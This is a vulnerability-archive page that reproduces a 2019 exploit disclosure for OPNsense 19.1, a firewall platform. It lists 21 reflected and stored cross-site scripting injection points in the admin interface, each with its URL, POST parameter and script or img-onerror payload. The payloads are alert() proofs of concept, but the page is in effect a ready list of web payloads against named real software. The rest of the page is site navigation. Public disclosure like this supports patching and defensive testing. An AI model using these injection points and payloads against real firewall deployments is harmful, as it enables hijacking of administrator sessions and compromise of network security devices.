OPNsense 19.1 Cross Site Scripting

OPNsense 19.1 Cross Site Scripting: Posted Feb 1, 2019; Authored by Ozer Goker; OPNsense version 19.1 suffers from a cross site scripting vulnerability.; tags | exploit, xss; SHA-256 | 1e48a539c9ed21ef9ac9f3037fbf7b082d9418e82ef5ed9c8df574caf19008cb; Download | Favorite | View

OPNsense 19.1 Cross Site Scripting

##################################################################################################################################
# Exploit Title: OPNsense 19.1 | Cross-Site Scripting
# Date: 01.02.2019
# Exploit Author: Ozer Goker
# Vendor Homepage: https://opnsense.org
# Software Link:
http://mirror.ams1.nl.leaseweb.net/opnsense/releases/19.1/OPNsense-19.1-OpenSSL-dvd-amd64.iso.bz2
# Version: 19.1
##################################################################################################################################

Introduction
OPNsense is an open source, easy-to-use and easy-to-build FreeBSD based
firewall and routing platform. OPNsense includes most of the features
available in expensive commercial firewalls, and more in many cases. It
brings the rich feature set of commercial offerings with the benefits of
open and verifiable sources.


#################################################################################


XSS details: Reflected & Stored

#################################################################################

XSS1 | Reflected

URL
http://192.168.2.200/diag_backup.php

METHOD
Post

PARAMETER
GDrive_GDriveEmail

PAYLOAD
"><script>alert(1)</script>

#################################################################################

XSS2 | Reflected

URL
http://192.168.2.200/diag_backup.php

METHOD
Post

PARAMETER
GDrive_GDriveFolderID

PAYLOAD
"><script>alert(2)</script>

#################################################################################

XSS3 | Reflected

URL
http://192.168.2.200/diag_backup.php

METHOD
Post

PARAMETER
GDrive_GDriveBackupCount

PAYLOAD
"><script>alert(3)</script>

#################################################################################

XSS4 | Reflected

URL
http://192.168.2.200/diag_backup.php

METHOD
Post

PARAMETER
Nextcloud_url

PAYLOAD
"><script>alert(4)</script>

#################################################################################

XSS5 | Reflected

URL
http://192.168.2.200/diag_backup.php

METHOD
Post

PARAMETER
Nextcloud_user

PAYLOAD
"><script>alert(5)</script>

#################################################################################

XSS6 | Reflected

URL
http://192.168.2.200/diag_backup.php

METHOD
Post

PARAMETER
Nextcloud_password

PAYLOAD
"><script>alert(6)</script>

#################################################################################

XSS7 | Reflected

URL
http://192.168.2.200/diag_backup.php

METHOD
Post

PARAMETER
Nextcloud_password_encryption

PAYLOAD
"><script>alert(7)</script>

#################################################################################

XSS8 | Reflected

URL
http://192.168.2.200/diag_backup.php

METHOD
Post

PARAMETER
Nextcloud_backupdir

PAYLOAD
"><script>alert(8)</script>

#################################################################################

XSS9 | Stored

URL
http://192.168.2.200/system_advanced_sysctl.php?act=edit

METHOD
Post

PARAMETER
tunable

PAYLOAD
"><script>alert(9)</script>

#################################################################################

XSS10 | Reflected

URL
http://192.168.2.200/system_advanced_sysctl.php?act=edit

METHOD
Post

PARAMETER
value

PAYLOAD
"><script>alert(10)</script>

#################################################################################

XSS11 | Reflected

URL
http://192.168.2.200/interfaces_vlan_edit.php

METHOD
Post

PARAMETER
tag

PAYLOAD
"><script>alert(11)</script>

#################################################################################

XSS2 | Reflected

URL
http://192.168.2.200/interfaces_vlan_edit.php

METHOD
Post

PARAMETER
descr

PAYLOAD
"><script>alert(12)</script>

#################################################################################

XSS13 | Reflected

URL
http://192.168.2.200/interfaces_vlan_edit.php

METHOD
Post

PARAMETER
vlanif

PAYLOAD
"><script>alert(13)</script>

#################################################################################

XSS14 | Reflected

URL
http://192.168.2.200/diag_ping.php

METHOD
Post

PARAMETER
host

PAYLOAD
"><script>alert(14)</script>

#################################################################################

XSS15 | Reflected

URL
http://192.168.2.200/diag_traceroute.php

METHOD
Post

PARAMETER
host

PAYLOAD
"><script>alert(15)</script>

#################################################################################

XSS16 | Stored

URL
http://192.168.2.200/firewall_rules_edit.php?if=FloatingRules

METHOD
Post

PARAMETER
category

PAYLOAD
"><script>alert(16)</script>

#################################################################################

XSS17 | Stored

URL
http://192.168.2.200/firewall_rules_edit.php?if=lan

METHOD
Post

PARAMETER
category

PAYLOAD
"><script>alert(17)</script>

#################################################################################

XSS18 | Stored

URL
http://192.168.2.200/firewall_rules_edit.php?if=wan

METHOD
Post

PARAMETER
category

PAYLOAD
"><script>alert(18)</script>

#################################################################################

XSS19 | Reflected

URL
http://192.168.2.200/vpn_ipsec_settings.php

METHOD
Post

PARAMETER
passthrough_networks%5B%5D

PAYLOAD
<img%20src=x%20onerror=alert(19)>

#################################################################################

XSS20 | Reflected

URL
http://192.168.2.200/ui/monit

METHOD
Post

PARAMETER
mailserver

PAYLOAD
<img src=x onerror=alert(20)>

#################################################################################

XSS21 | Reflected

URL
http://192.168.2.200/ui/proxy

METHOD
Post

PARAMETER
ignoreLogACL

PAYLOAD
<img src=x onerror=alert(21)>

#################################################################################

Top Authors In Last 30 Days

Red Hat 215 files
indoushka 165 files
Jay Turla 150 files
Ubuntu 74 files
h00die 54 files
juan vazquez 43 files
sinn3r 41 files
H D Moore 31 files
Karn Ganeshen 23 files
Pedro Ribeiro 22 files

File Archives

Systems

AIX (430)
Apple (2,114)
BSD (378)
CentOS (61)
Cisco (1,954)
Debian (7,123)
Fedora (1,693)
FreeBSD (1,247)
Gentoo (4,567)
HPUX (881)
iOS (389)
iPhone (108)
IRIX (220)
Juniper (71)
Linux (51,209)
Mac OS X (696)
Mandriva (3,105)
NetBSD (256)
OpenBSD (489)
RedHat (16,823)
Slackware (941)
Solaris (1,615)
SUSE (1,444)
Ubuntu (9,848)
UNIX (9,455)
UnixWare (188)
Windows (6,772)
Other

OPNsense 19.1 Cross Site Scripting

OPNsense 19.1 Cross Site Scripting

File Archive:

September 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

OPNsense 19.1 Cross Site Scripting

Share This

OPNsense 19.1 Cross Site Scripting

File Archive:

September 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems